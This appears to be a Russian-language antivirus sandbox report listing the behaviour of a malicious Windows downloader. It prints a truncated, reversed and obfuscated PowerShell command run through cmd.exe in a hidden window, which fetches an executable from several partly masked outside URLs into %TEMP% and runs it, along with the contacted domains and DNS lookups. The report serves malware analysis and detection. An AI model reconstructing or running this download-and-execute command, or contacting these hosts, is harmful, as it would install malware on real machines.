Техническая информация
- '<SYSTEM32>\cmd.exe' /V:O/C"set NV=;'SYs'=hWN$}}{hctac}};kaerb;'zzM'=LJH$;Uam$ metI-ekovnI{ )00008 eg- htgnel.)Uam$ metI-teG(( fI;'OoB'=mfO$;)Uam$ ,kuD$(eliFdaolnwoD.sPm${yrt{)DDh$ ni kuD$(hcaerof;'exe.'+HPH$+'\'+p...
- %TEMP%\878.exe
- %TEMP%\878.exe
- %TEMP%\878.exe
- 'cl###ft.cba.pl':80
- 'yo#####da-palermo.org':80
- 'wm###stoms.com':80
- http://cl###ft.cba.pl/f
- http://www.yo#####da-palermo.org/Ra7
- http://www.wm###stoms.com/R
- http://www.wm###stoms.com/cgi-sys/suspendedpage.cgi
- DNS ASK cl###ft.cba.pl
- DNS ASK yo#####da-palermo.org
- DNS ASK wm###stoms.com
- DNS ASK sc#####.#ebhawksittesting.com
- DNS ASK ed#######el.marigoldcatba.com
- '<SYSTEM32>\cmd.exe' /V:O/C"set NV=;'SYs'=hWN$}}{hctac}};kaerb;'zzM'=LJH$;Uam$ metI-ekovnI{ )00008 eg- htgnel.)Uam$ metI-teG(( fI;'OoB'=mfO$;)Uam$ ,kuD$(eliFdaolnwoD.sPm${yrt{)DDh$ ni kuD$(hcaerof;'exe.'+HPH$+'\'+p...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =thj